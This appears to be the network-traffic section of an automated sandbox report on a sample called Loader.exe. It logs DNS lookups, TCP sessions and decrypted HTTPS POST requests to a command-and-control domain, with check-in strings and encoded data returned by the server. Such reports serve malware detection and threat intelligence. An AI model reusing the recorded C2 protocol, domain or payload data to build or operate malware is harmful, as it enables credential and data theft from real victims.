                                                                                      Dec 20, 2024 17:41:47.444899082 CET44349767104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:47.444998980 CET49767443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:47.445322037 CET49767443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:47.445338964 CET44349767104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:48.661549091 CET44349767104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:48.661685944 CET49767443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:48.663085938 CET49767443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:48.663103104 CET44349767104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:48.663352013 CET44349767104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:48.664743900 CET49767443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:48.664900064 CET49767443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:48.664932013 CET44349767104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:49.448012114 CET44349767104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:49.448278904 CET44349767104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:49.448332071 CET49767443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:49.448359966 CET49767443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:49.574582100 CET49773443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:49.574646950 CET44349773104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:49.574733973 CET49773443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:49.575045109 CET49773443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:49.575064898 CET44349773104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:50.819829941 CET44349773104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:50.819968939 CET49773443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:50.821238995 CET49773443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:50.821250916 CET44349773104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:50.821517944 CET44349773104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:50.822808027 CET49773443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:50.822948933 CET49773443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:50.822979927 CET44349773104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:50.823050976 CET49773443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:50.867335081 CET44349773104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:51.622442007 CET44349773104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:51.622714043 CET44349773104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:51.622761011 CET49773443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:51.622781038 CET49773443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:52.185323954 CET49780443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:52.185370922 CET44349780104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:52.185477972 CET49780443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:52.185898066 CET49780443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:52.185914040 CET44349780104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:53.431325912 CET44349780104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:53.431410074 CET49780443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:53.433197975 CET49780443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:53.433207035 CET44349780104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:53.433557987 CET44349780104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:53.434983969 CET49780443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:53.435127020 CET49780443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:53.435173988 CET44349780104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:53.435247898 CET49780443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:53.435256004 CET44349780104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:54.335671902 CET44349780104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:54.335958004 CET49780443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:54.680305004 CET49786443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:54.680349112 CET44349786104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:54.680501938 CET49786443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:54.680773020 CET49786443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:54.680788994 CET44349786104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:55.900676966 CET44349786104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:55.900794983 CET49786443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:55.902383089 CET49786443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:55.902389050 CET44349786104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:55.902620077 CET44349786104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:55.905221939 CET49786443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:55.905559063 CET49786443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:55.905565023 CET44349786104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:56.569977999 CET44349786104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:56.570116043 CET44349786104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:56.570194006 CET49786443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:56.570244074 CET49786443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:56.570265055 CET44349786104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:56.627342939 CET49792443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:56.627383947 CET44349792104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:56.627485037 CET49792443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:56.627810001 CET49792443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:56.627825022 CET44349792104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:57.870930910 CET44349792104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:57.871063948 CET49792443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:57.872438908 CET49792443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:57.872457981 CET44349792104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:57.872795105 CET44349792104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:57.874484062 CET49792443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:57.874568939 CET49792443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:57.874576092 CET44349792104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:59.567353010 CET44349792104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:59.567595959 CET44349792104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:59.567646980 CET49792443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:59.567646980 CET49792443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:59.604072094 CET49799443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:59.604116917 CET44349799104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:41:59.604217052 CET49799443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:59.604541063 CET49799443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:41:59.604557991 CET44349799104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:42:00.820846081 CET44349799104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:42:00.820992947 CET49799443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:42:00.822267056 CET49799443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:42:00.822288990 CET44349799104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:42:00.822540998 CET44349799104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:42:00.823904991 CET49799443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:42:00.823957920 CET49799443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:42:00.823983908 CET44349799104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:42:01.648260117 CET44349799104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:42:01.648350954 CET44349799104.21.90.135192.168.2.5
                                                                                      Dec 20, 2024 17:42:01.648612976 CET49799443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:42:01.648736954 CET49799443192.168.2.5104.21.90.135
                                                                                      Dec 20, 2024 17:42:01.648761034 CET44349799104.21.90.135192.168.2.5

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 20, 2024 17:41:42.751671076 CET5380153192.168.2.51.1.1.1
                                                                                      Dec 20, 2024 17:41:43.083385944 CET53538011.1.1.1192.168.2.5

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Dec 20, 2024 17:41:42.751671076 CET192.168.2.51.1.1.10xe620Standard query (0)ingreem-eilish.bizA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Dec 20, 2024 17:41:43.083385944 CET1.1.1.1192.168.2.50xe620No error (0)ingreem-eilish.biz104.21.90.135A (IP address)IN (0x0001)false
                                                                                      Dec 20, 2024 17:41:43.083385944 CET1.1.1.1192.168.2.50xe620No error (0)ingreem-eilish.biz172.67.200.171A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • ingreem-eilish.biz

                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.549756104.21.90.1354436448C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-20 16:41:44 UTC265OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: ingreem-eilish.biz
                                                                                      2024-12-20 16:41:44 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                      Data Ascii: act=life
                                                                                      2024-12-20 16:41:45 UTC1037INHTTP/1.1 200 OK
                                                                                      Date: Fri, 20 Dec 2024 16:41:44 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=jjg1tfo5mql4c02p6epc0aa8dj; expires=Tue, 15-Apr-2025 10:28:23 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOklVe82h95%2FPNyB4bGLRU8wxmdHkI1L92oTFE4L0Yeqk0GuMMq3nml2hn2sUw%2Fb1S0RmDkxTWKkrmIgrk3dDHLaWgKZHbkhTxLfpTNMCGY7xAfzCFBnJRXAYKtZDLivRbsLrE8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f5114e61eed0fa7-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2912&min_rtt=1665&rtt_var=1515&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1753753&cwnd=220&unsent_bytes=0&cid=89cf866507c89cdc&ts=736&x=0"
                                                                                      2024-12-20 16:41:45 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                      Data Ascii: 2ok
                                                                                      2024-12-20 16:41:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.549761104.21.90.1354436448C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-20 16:41:46 UTC266OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 86
                                                                                      Host: ingreem-eilish.biz
                                                                                      2024-12-20 16:41:46 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--b58c2f805636&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                      2024-12-20 16:41:47 UTC1040INHTTP/1.1 200 OK
                                                                                      Date: Fri, 20 Dec 2024 16:41:46 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=r44rrqv1c07gbim6gakjd1td0c; expires=Tue, 15-Apr-2025 10:28:25 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WejyeJT4ZB0w7ZBsilkIOHSMaLLT%2F57iNTErB5GsNg4tQNW%2B9JI6Ps537O4VhWsmIM86KArOKka4XrnzSsg34H34mmMFLrkfqc9vv6SisAjjk%2B43jojHVuAS4B%2B1W9vbp9smmUM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f5114f29f1e0fa7-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1645&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=988&delivery_rate=1752701&cwnd=220&unsent_bytes=0&cid=7cb820543e6a7c96&ts=724&x=0"
                                                                                      2024-12-20 16:41:47 UTC329INData Raw: 34 33 30 63 0d 0a 46 34 51 50 6a 52 4c 70 7a 4f 77 54 71 4f 46 30 42 58 78 6e 6f 5a 6a 54 65 48 51 51 59 6b 48 65 35 74 4e 64 41 4f 7a 37 68 54 39 73 70 6e 6d 76 4b 4e 33 67 7a 6d 44 4e 77 30 35 6a 48 51 76 53 2f 66 39 61 46 58 52 41 65 37 69 48 76 79 35 6c 77 4e 6e 7a 55 6a 57 2b 61 65 78 2b 6d 71 6e 41 4d 63 32 5a 56 6a 38 6e 48 49 50 39 76 56 70 4f 4d 67 63 72 76 49 65 2f 50 32 47 48 6c 50 56 54 64 4f 78 6a 36 6e 71 4d 72 34 68 79 78 49 77 52 59 42 6b 47 79 2f 61 36 46 52 78 39 51 47 33 38 67 36 6c 2f 4f 73 36 32 34 45 74 32 79 57 37 2b 65 63 75 78 77 47 69 4b 68 42 6f 6e 52 6b 58 41 2f 62 45 55 45 6e 51 4a 4b 62 61 4f 74 7a 35 6b 68 6f 76 73 57 58 2f 73 62 65 6c 37 68 71 61 63 66 38 36 4c 47 6d 59 54 42 6f 4f 30 38 52 30 4f 4d 6c 68 6a 37 37 61 79 4c
                                                                                      Data Ascii: 430cF4QPjRLpzOwTqOF0BXxnoZjTeHQQYkHe5tNdAOz7hT9spnmvKN3gzmDNw05jHQvS/f9aFXRAe7iHvy5lwNnzUjW+aex+mqnAMc2ZVj8nHIP9vVpOMgcrvIe/P2GHlPVTdOxj6nqMr4hyxIwRYBkGy/a6FRx9QG38g6l/Os624Et2yW7+ecuxwGiKhBonRkXA/bEUEnQJKbaOtz5khovsWX/sbel7hqacf86LGmYTBoO08R0OMlhj77ayL
                                                                                      2024-12-20 16:41:47 UTC1369INData Raw: 36 42 6e 45 44 4e 37 47 56 38 53 41 73 6c 39 6e 67 55 54 57 2b 4c 65 6c 2b 69 71 4f 4f 59 38 4b 49 48 57 49 4d 44 73 72 33 76 42 6f 62 65 41 38 67 76 49 4f 37 4e 57 32 45 6e 65 70 51 63 2b 5a 74 72 7a 37 4c 71 5a 59 78 6b 73 4d 31 59 67 34 43 7a 2b 7a 7a 49 46 5a 74 54 6a 72 38 67 37 31 2f 4f 73 36 52 34 6c 35 32 37 57 4c 73 65 49 43 38 6a 6d 50 4d 6a 68 4e 31 47 41 44 4e 38 4c 49 49 48 48 77 47 49 4c 57 50 75 44 70 6c 69 74 6d 70 48 58 4c 2b 4c 62 63 77 71 71 4f 46 66 63 43 55 46 69 63 42 53 39 71 36 74 68 5a 57 4b 6b 41 6e 76 59 43 77 4f 32 79 41 6e 65 74 62 65 2b 74 69 36 58 71 4c 71 59 52 35 77 6f 49 62 62 42 45 46 78 76 65 31 48 42 70 7a 42 57 50 79 78 4c 59 6e 49 74 62 5a 79 56 70 32 39 43 2f 61 63 34 57 67 69 57 65 4b 6e 46 68 2b 58 67 4c 50 75 75
                                                                                      Data Ascii: 6BnEDN7GV8SAsl9ngUTW+Lel+iqOOY8KIHWIMDsr3vBobeA8gvIO7NW2EnepQc+Ztrz7LqZYxksM1Yg4Cz+zzIFZtTjr8g71/Os6R4l527WLseIC8jmPMjhN1GADN8LIIHHwGILWPuDplitmpHXL+LbcwqqOFfcCUFicBS9q6thZWKkAnvYCwO2yAnetbe+ti6XqLqYR5woIbbBEFxve1HBpzBWPyxLYnItbZyVp29C/ac4WgiWeKnFh+XgLPuu
                                                                                      2024-12-20 16:41:47 UTC1369INData Raw: 51 47 33 38 67 36 6c 2f 4f 73 36 74 34 46 46 34 36 53 2f 61 63 34 57 67 69 57 65 4b 6e 46 68 2b 58 67 4c 50 75 75 6c 61 47 6e 73 41 4b 4c 61 41 73 54 68 76 69 35 72 67 58 6e 6a 68 5a 2b 46 33 6a 36 4b 48 66 4d 79 44 45 57 4d 62 46 38 62 7a 76 52 5a 57 50 45 41 6b 70 4d 54 70 66 30 32 4a 6a 2b 52 79 64 76 64 6b 72 32 2f 46 74 38 35 32 78 73 4e 4f 4a 78 6b 41 79 2f 47 33 45 68 5a 67 42 53 32 33 68 62 73 35 59 34 4f 56 34 56 31 30 35 6d 76 6a 63 49 79 70 6e 47 50 50 68 51 52 74 58 6b 75 44 2f 61 6c 61 54 6a 49 32 4d 36 75 56 70 33 31 58 6a 5a 66 70 57 6d 4f 6d 63 71 46 70 79 36 6d 43 4d 5a 4c 44 48 57 63 53 41 73 76 38 74 52 49 5a 66 51 6b 78 76 59 69 2f 4c 57 57 4f 6b 4f 6c 53 65 65 39 67 36 48 32 41 70 49 4e 31 7a 59 4a 57 4b 56 34 43 32 37 72 70 57 69 42
                                                                                      Data Ascii: QG38g6l/Os6t4FF46S/ac4WgiWeKnFh+XgLPuulaGnsAKLaAsThvi5rgXnjhZ+F3j6KHfMyDEWMbF8bzvRZWPEAkpMTpf02Jj+Rydvdkr2/Ft852xsNOJxkAy/G3EhZgBS23hbs5Y4OV4V105mvjcIypnGPPhQRtXkuD/alaTjI2M6uVp31XjZfpWmOmcqFpy6mCMZLDHWcSAsv8tRIZfQkxvYi/LWWOkOlSee9g6H2ApIN1zYJWKV4C27rpWiB
                                                                                      2024-12-20 16:41:47 UTC1369INData Raw: 49 2b 35 50 6d 36 41 6e 75 4a 55 66 65 35 2f 37 6e 53 44 72 34 42 2b 79 34 63 54 59 68 6f 43 78 2f 79 2b 57 6c 67 79 42 7a 76 38 33 50 45 51 52 62 76 62 78 6d 63 31 2b 53 50 32 4d 49 79 69 7a 69 6d 4b 6a 78 56 72 46 67 72 46 38 37 30 51 48 33 6b 4d 4b 4c 69 49 75 44 70 6b 6a 35 7a 69 58 48 48 71 5a 2b 6c 7a 69 4b 47 42 66 73 4c 44 57 43 63 5a 48 59 4f 69 38 54 38 42 65 51 34 6c 2f 4a 76 2f 4a 69 4b 4a 6c 61 63 46 4e 65 70 6b 36 58 61 4f 6f 6f 39 33 77 6f 59 65 59 78 38 44 78 66 6d 2b 48 68 4e 7a 44 79 65 77 69 72 73 2b 59 34 4b 53 36 46 5a 77 70 69 4f 76 64 35 50 75 31 6a 48 37 67 41 42 77 44 67 6d 44 35 66 38 44 56 6e 55 4d 59 2b 54 45 73 43 31 6f 68 4a 66 69 55 6e 44 6c 59 75 68 39 6a 61 4b 45 65 4d 4b 46 47 57 34 4d 42 73 2f 30 74 68 51 61 66 41 30 70
                                                                                      Data Ascii: I+5Pm6AnuJUfe5/7nSDr4B+y4cTYhoCx/y+WlgyBzv83PEQRbvbxmc1+SP2MIyizimKjxVrFgrF870QH3kMKLiIuDpkj5ziXHHqZ+lziKGBfsLDWCcZHYOi8T8BeQ4l/Jv/JiKJlacFNepk6XaOoo93woYeYx8Dxfm+HhNzDyewirs+Y4KS6FZwpiOvd5Pu1jH7gABwDgmD5f8DVnUMY+TEsC1ohJfiUnDlYuh9jaKEeMKFGW4MBs/0thQafA0p
                                                                                      2024-12-20 16:41:47 UTC1369INData Raw: 5a 70 6e 4a 50 67 57 6e 37 75 5a 75 42 32 6d 61 4b 41 59 38 2b 52 42 43 64 51 52 63 54 69 38 55 4a 57 52 41 63 7a 72 49 66 7a 44 6e 53 4e 6a 2b 78 51 65 61 5a 79 6f 57 6e 4c 71 59 49 78 6b 73 4d 51 61 42 63 47 7a 50 75 34 46 68 74 33 43 53 61 39 67 72 55 31 61 49 36 66 34 56 78 77 37 47 37 75 65 6f 4b 70 68 6e 62 4a 6b 56 59 70 58 67 4c 62 75 75 6c 61 50 33 55 53 4c 61 7a 45 72 6e 46 37 7a 70 37 72 48 53 32 6d 61 65 56 2f 6a 36 6d 43 64 38 2b 46 47 32 59 52 42 4d 50 31 74 52 45 66 64 41 45 75 75 59 6d 31 4c 57 69 46 6c 75 74 55 65 65 73 74 6f 54 43 4d 74 73 34 70 69 72 49 62 61 52 41 43 31 62 71 75 56 41 38 79 42 79 2f 38 33 50 45 2b 62 6f 47 61 36 46 35 32 35 32 66 39 59 6f 65 6e 68 6e 54 47 69 42 68 68 44 41 50 4d 38 37 49 5a 48 33 55 49 4c 37 61 48 74
                                                                                      Data Ascii: ZpnJPgWn7uZuB2maKAY8+RBCdQRcTi8UJWRAczrIfzDnSNj+xQeaZyoWnLqYIxksMQaBcGzPu4Fht3CSa9grU1aI6f4Vxw7G7ueoKphnbJkVYpXgLbuulaP3USLazErnF7zp7rHS2maeV/j6mCd8+FG2YRBMP1tREfdAEuuYm1LWiFlutUeestoTCMts4pirIbaRAC1bquVA8yBy/83PE+boGa6F5252f9YoenhnTGiBhhDAPM87IZH3UIL7aHt
                                                                                      2024-12-20 16:41:47 UTC1369INData Raw: 42 38 55 31 69 34 58 4b 68 61 63 75 70 67 6a 47 53 77 78 42 75 47 41 4c 46 39 4b 4d 66 45 48 30 50 4b 72 57 41 75 54 78 69 69 70 33 67 57 48 62 71 5a 75 68 7a 68 4b 71 48 66 38 4f 4d 56 69 6c 65 41 74 75 36 36 56 6f 33 61 51 4d 76 73 63 53 75 63 58 76 4f 6e 75 73 64 4c 61 5a 68 34 58 57 4c 70 49 68 31 7a 34 55 63 59 68 34 4f 77 50 57 31 48 42 4a 39 41 43 69 31 68 62 63 36 61 49 57 66 36 6c 35 7a 34 43 32 68 4d 49 79 32 7a 69 6d 4b 6f 77 31 71 45 67 4b 44 35 66 38 44 56 6e 55 4d 59 2b 54 45 75 6a 4e 6d 69 5a 6e 71 58 6e 33 6a 61 65 56 31 69 36 61 63 65 63 71 45 42 48 55 65 44 4d 62 32 73 68 6f 53 64 41 6b 6c 76 34 44 78 63 53 4b 4a 67 61 63 46 4e 63 74 68 36 46 6d 4d 74 63 35 75 68 4a 70 57 59 42 4a 46 6d 37 71 77 45 52 78 39 44 53 43 36 68 37 6f 36 61 49
                                                                                      Data Ascii: B8U1i4XKhacupgjGSwxBuGALF9KMfEH0PKrWAuTxiip3gWHbqZuhzhKqHf8OMVileAtu66Vo3aQMvscSucXvOnusdLaZh4XWLpIh1z4UcYh4OwPW1HBJ9ACi1hbc6aIWf6l5z4C2hMIy2zimKow1qEgKD5f8DVnUMY+TEujNmiZnqXn3jaeV1i6acecqEBHUeDMb2shoSdAklv4DxcSKJgacFNcth6FmMtc5uhJpWYBJFm7qwERx9DSC6h7o6aI
                                                                                      2024-12-20 16:41:47 UTC1369INData Raw: 4e 66 51 74 74 7a 44 4d 72 5a 78 6a 7a 49 41 41 5a 46 6b 37 2f 64 32 72 46 78 42 6c 45 52 32 43 67 36 73 79 5a 4a 6d 49 71 30 68 32 36 47 50 6f 5a 73 76 67 7a 6e 36 4b 32 79 38 6e 56 6b 58 38 74 50 45 43 56 69 70 41 46 72 2b 4b 76 7a 68 30 6e 39 54 41 52 33 6a 67 65 76 34 77 78 65 36 49 4d 5a 4c 54 57 43 63 61 46 49 4f 69 34 55 68 4e 4a 31 4e 30 37 4e 61 75 63 58 76 4f 6a 36 63 46 4a 36 67 74 2f 54 44 54 37 73 6c 79 32 4a 45 51 5a 41 67 47 68 4d 53 50 4e 42 46 30 42 53 53 73 78 70 38 30 64 6f 6e 5a 71 52 31 36 70 6a 58 57 4d 4d 50 75 73 54 2b 4b 6d 31 59 2f 58 6a 44 41 39 4c 38 64 41 47 4e 4e 44 62 75 43 74 44 68 79 7a 4c 66 73 53 58 4b 6d 49 36 39 32 79 2f 62 65 50 34 71 48 42 79 64 47 56 5a 47 68 35 45 6c 42 49 6c 49 38 38 70 33 78 4b 53 4c 57 79 36 6b
                                                                                      Data Ascii: NfQttzDMrZxjzIAAZFk7/d2rFxBlER2Cg6syZJmIq0h26GPoZsvgzn6K2y8nVkX8tPECVipAFr+Kvzh0n9TAR3jgev4wxe6IMZLTWCcaFIOi4UhNJ1N07NaucXvOj6cFJ6gt/TDT7sly2JEQZAgGhMSPNBF0BSSsxp80donZqR16pjXWMMPusT+Km1Y/XjDA9L8dAGNNDbuCtDhyzLfsSXKmI692y/beP4qHBydGVZGh5ElBIlI88p3xKSLWy6k
                                                                                      2024-12-20 16:41:47 UTC1369INData Raw: 75 46 2b 6a 4c 69 66 4d 59 54 44 47 53 64 47 50 49 4f 79 38 53 56 59 4d 68 68 6a 35 4d 53 45 50 47 79 41 6e 76 46 4d 4f 4d 46 6a 36 48 47 64 76 70 6c 2b 68 61 30 67 52 6c 35 4c 67 2f 7a 78 51 6b 51 38 51 43 65 74 78 4f 6c 76 4d 4e 58 4d 74 41 6f 6c 74 48 4b 68 61 63 75 34 7a 69 6d 59 7a 56 5a 31 58 6c 32 44 76 62 49 49 42 48 51 44 4e 62 2f 44 6a 77 46 46 67 4a 37 6d 53 32 58 72 59 63 35 7a 6d 71 53 77 54 39 2b 41 47 47 6b 5a 45 39 4b 36 2f 31 6f 5a 4d 6c 67 61 2f 4d 7a 78 41 43 7a 4f 67 61 63 46 4e 64 4e 75 34 58 36 4d 75 4a 38 38 37 59 30 52 5a 67 67 56 7a 76 61 51 47 51 64 34 51 47 33 38 67 76 46 6e 4d 4d 44 5a 34 30 77 31 76 6a 32 39 4b 39 37 39 32 53 47 59 6e 46 68 2b 58 68 4f 44 6f 75 4e 55 56 6d 42 41 65 2f 7a 44 73 69 31 77 69 4a 72 78 58 6a 4c 59
                                                                                      Data Ascii: uF+jLifMYTDGSdGPIOy8SVYMhhj5MSEPGyAnvFMOMFj6HGdvpl+ha0gRl5Lg/zxQkQ8QCetxOlvMNXMtAoltHKhacu4zimYzVZ1Xl2DvbIIBHQDNb/DjwFFgJ7mS2XrYc5zmqSwT9+AGGkZE9K6/1oZMlga/MzxACzOgacFNdNu4X6MuJ887Y0RZggVzvaQGQd4QG38gvFnMMDZ40w1vj29K9792SGYnFh+XhODouNUVmBAe/zDsi1wiJrxXjLY
